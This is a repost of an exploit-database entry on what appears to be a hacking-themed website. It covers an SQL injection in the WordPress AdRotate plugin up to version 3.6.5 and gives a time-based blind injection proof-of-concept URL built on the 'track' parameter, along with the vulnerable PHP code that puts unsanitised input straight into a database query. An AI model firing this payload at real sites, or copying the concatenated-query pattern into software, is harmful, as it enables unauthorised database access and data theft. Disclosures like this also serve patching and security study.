Sunday, 2025-02-02, 4:05 AM
Welcome Guest | RSS
Site menu
Login form
Buy Wifi Hacking Adapter
 

Best Laptop for Hacking
 
Main Sign Up Login

Main » 2011 » December » 27 » WordPress AdRotate plugin <= 3.6.5 SQL Injection
11:48 AM
WordPress AdRotate plugin <= 3.6.5 SQL Injection
# Exploit Title: WordPress AdRotate plugin <= 3.6.5 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ad....3.6.5.zip
# Version: 3.6.5 (tested)
# Note: magic_quotes has to be turned off


PoC

http://www.site.com/wp-content/plugins/a...p?track=1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23


Vulnerable code

if(isset($_GET['track']) OR $_GET['track'] != '') {
$meta = urldecode($_GET['track']);
...
list($ad, $group, $block) = explode("-", $meta);
...
$bannerurl = $wpdb->get_var("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;");

Vulnerable App : Download

Credit :- MasTerCom3
Views: 1398 | Added by: defaultNick | Tags: Wordpress Exploits, Latest Wordpress exploits, wordpress vulnerabilities | Rating: 0.0/0
Wifi Hacking Adapter : Recommended by Rahul Tyagi
Copyright RahulEthicalHackingWorks © 2025
Create a free website with uCoz